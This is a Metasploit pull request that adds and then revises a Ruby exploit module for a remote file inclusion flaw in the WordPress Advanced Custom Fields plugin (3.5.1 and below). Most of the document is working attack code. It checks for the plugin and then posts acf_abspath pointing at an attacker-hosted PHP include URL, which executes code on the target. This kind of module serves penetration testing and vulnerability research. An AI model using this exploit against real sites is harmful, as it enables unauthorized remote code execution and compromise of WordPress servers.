### PR TITLE
Added exploit wp_advanced_customs_fields_exec.rb

### DIFF
--- a/modules/exploits/multi/http/wp_advanced_custom_fields_exec.rb
+++ b/modules/exploits/multi/http/wp_advanced_custom_fields_exec.rb
@@ -75,12 +75,12 @@ class Metasploit3 < Msf::Exploit::Remote
 		uri = target_uri.path
 		uri << '/' if uri[-1,1] != '/'
 
-		pluginPath = 'wp-content/plugins/advanced-custom-fields/core/actions/export.php'
+		plugin_path = 'wp-content/plugins/advanced-custom-fields/core/actions/export.php'
 
 		print_status('Sending request')
 		res = send_request_cgi({
 			'method' => 'POST',
-			'uri'    => "#{uri}#{pluginPath}",
+			'uri'    => "#{uri}#{plugin_path}",
 			'data'   => "acf_abspath=#{php_include_url}"
 		})
 

--- a/modules/exploits/multi/http/wp_advanced_custom_fields_exec.rb
+++ b/modules/exploits/multi/http/wp_advanced_custom_fields_exec.rb
@@ -51,6 +51,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		register_options(
 			[
 				OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/']),
+				OptString.new('PLUGINSPATH', [true, 'The relative path to the plugins folder', 'wp-content/plugins/']),
 			], self.class)
 	end
 
@@ -60,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		res = send_request_cgi({
 			'method' => 'POST',
-			'uri'    => "#{uri}wp-content/plugins/advanced-custom-fields/core/api.php"
+			'uri'    => "#{uri}#{datastore['PLUGINSPATH']}advanced-custom-fields/core/api.php"
 		})
 
 		if res and res.code == 200
@@ -75,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		uri = target_uri.path
 		uri << '/' if uri[-1,1] != '/'
 
-		plugin_path = 'wp-content/plugins/advanced-custom-fields/core/actions/export.php'
+		plugin_path = "#{datastore['PLUGINSPATH']}advanced-custom-fields/core/actions/export.php"
 
 		print_status('Sending request')
 		res = send_request_cgi({

--- a/modules/exploits/multi/http/wp_advanced_custom_fields_exec.rb
+++ b/modules/exploits/multi/http/wp_advanced_custom_fields_exec.rb
@@ -46,7 +46,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Arch'           => ARCH_PHP,
 			'Targets'        => [[ 'Automatic', { }]],
 			'DisclosureDate' => 'Nov 14 2012',
-			'DefaultTarget' => 0))
+			'DefaultTarget'  => 0))
 
 		register_options(
 			[

--- a/modules/exploits/multi/http/wp_advanced_custom_fields_exec.rb
+++ b/modules/exploits/multi/http/wp_advanced_custom_fields_exec.rb
@@ -59,8 +59,8 @@ class Metasploit3 < Msf::Exploit::Remote
 		uri << '/' if uri[-1,1] != '/'
 
 		res = send_request_cgi({
-			'method' => 'GET',
-			'uri'    => "#{uri}wp-content/plugins/advanced-custom-fields/core/actions/export.php"
+			'method' => 'POST',
+			'uri'    => "#{uri}wp-content/plugins/advanced-custom-fields/core/api.php"
 		})
 
 		if res and res.code == 200

--- a/modules/exploits/multi/http/wp_advanced_custom_fields_exec.rb
+++ b/modules/exploits/multi/http/wp_advanced_custom_fields_exec.rb
@@ -1,0 +1,96 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Exploit::Remote::HttpServer::PHPInclude
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'WordPress Plugin Advanced Custom Fields Remote File Inclusion',
+			'Description'    => %q{
+					This module exploits a remote file inclusion flaw in the WordPress
+				blogging software plugin known as Advanced Custom Fields. The vulnerability allows for
+				remote file inclusion and remote code execution via the export.php script. The
+				Advanced Custom Fields plug-in versions 3.5.1 and below are vulnerable.
+			},
+			'Author'         =>
+				[
+					'Charlie Eriksen',
+				],
+			'License'        => MSF_LICENSE,
+			'References'     =>
+				[
+					['OSVDB', '87353'],
+					['URL', 'http://secunia.com/advisories/51037/'],
+				],
+			'Privileged'     => false,
+			'Payload'        =>
+				{
+					'DisableNops' => true,
+					'Compat'      =>
+						{
+							'ConnectionType' => 'find',
+						},
+					'Space'       => 262144, # 256k
+				},
+			'Platform'       => 'php',
+			'Arch'           => ARCH_PHP,
+			'Targets'        => [[ 'Automatic', { }]],
+			'DisclosureDate' => 'Nov 14 2012',
+			'DefaultTarget' => 0))
+
+		register_options(
+			[
+				OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/']),
+			], self.class)
+	end
+
+	def check
+		uri = target_uri.path
+		uri << '/' if uri[-1,1] != '/'
+
+		res = send_request_cgi({
+			'method' => 'GET',
+			'uri'    => "#{uri}wp-content/plugins/advanced-custom-fields/core/actions/export.php"
+		})
+
+		if res and res.code == 200
+			return Exploit::CheckCode::Detected
+		else
+			return Exploit::CheckCode::Safe
+		end
+	end
+
+	def php_exploit
+
+		uri = target_uri.path
+		uri << '/' if uri[-1,1] != '/'
+
+		pluginPath = 'wp-content/plugins/advanced-custom-fields/core/actions/export.php'
+
+		print_status('Sending request')
+		res = send_request_cgi({
+			'method' => 'POST',
+			'uri'    => "#{uri}#{pluginPath}",
+			'data'   => "acf_abspath=#{php_include_url}"
+		})
+
+		if res and res.code != 200
+			fail_with(Exploit::Failure::UnexpectedReply, "Unexpected reply - #{res.code}")
+		end
+
+		handler
+
+	end
+
+end
+

--- a/modules/exploits/multi/http/wp_advanced_custom_fields_exec.rb
+++ b/modules/exploits/multi/http/wp_advanced_custom_fields_exec.rb
@@ -24,7 +24,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			},
 			'Author'         =>
 				[
-					'Charlie Eriksen',
+					'Charlie Eriksen <charlie@ceriksen.com>',
 				],
 			'License'        => MSF_LICENSE,
 			'References'     =>

--- a/modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb
+++ b/modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb
@@ -20,7 +20,8 @@ class Metasploit3 < Msf::Exploit::Remote
 					This module exploits a remote file inclusion flaw in the WordPress
 				blogging software plugin known as Advanced Custom Fields. The vulnerability allows for
 				remote file inclusion and remote code execution via the export.php script. The
-				Advanced Custom Fields plug-in versions 3.5.1 and below are vulnerable.
+				Advanced Custom Fields plug-in versions 3.5.1 and below are vulnerable. This exploit 
+				only works when the php option allow_url_include is set to On(Default Off).
 			},
 			'Author'         =>
 				[
@@ -40,7 +41,6 @@ class Metasploit3 < Msf::Exploit::Remote
 						{
 							'ConnectionType' => 'find',
 						},
-					'Space'       => 262144, # 256k
 				},
 			'Platform'       => 'php',
 			'Arch'           => ARCH_PHP,
@@ -58,10 +58,12 @@ class Metasploit3 < Msf::Exploit::Remote
 	def check
 		uri = target_uri.path
 		uri << '/' if uri[-1,1] != '/'
+		uri << datastore['PLUGINSPATH']
+		uri << '/' if uri[-1,1] != '/'
 
 		res = send_request_cgi({
 			'method' => 'POST',
-			'uri'    => "#{uri}#{datastore['PLUGINSPATH']}advanced-custom-fields/core/api.php"
+			'uri'    => "#{uri}advanced-custom-fields/core/api.php"
 		})
 
 		if res and res.code == 200
@@ -72,24 +74,23 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def php_exploit
-
 		uri = target_uri.path
 		uri << '/' if uri[-1,1] != '/'
-
-		plugin_path = "#{datastore['PLUGINSPATH']}advanced-custom-fields/core/actions/export.php"
+		uri << datastore['PLUGINSPATH']
+		uri << '/' if uri[-1,1] != '/'
 
 		print_status('Sending request')
 		res = send_request_cgi({
 			'method' => 'POST',
-			'uri'    => "#{uri}#{plugin_path}",
+			'uri'    => "#{uri}advanced-custom-fields/core/actions/export.php",
 			'data'   => "acf_abspath=#{php_include_url}"
 		})
 
-		if res and res.code != 200
+		if res and res.body =~ /allow_url_include/
+			fail_with(Exploit::Failure::NotVulnerable, 'allow_url_include is disabled')
+		elsif res.code != 200
 			fail_with(Exploit::Failure::UnexpectedReply, "Unexpected reply - #{res.code}")
 		end
-
-		handler
 
 	end
 


### PR DESCRIPTION
Adding an exploit for a RFI in the Advanced Custom Fields plugin for Wordpress.

The vulnerable versions are 3.5.1 and below. They can be found here:
http://wordpress.org/extend/plugins/advanced-custom-fields/developers/

This will only work when the server has url include enabled. 
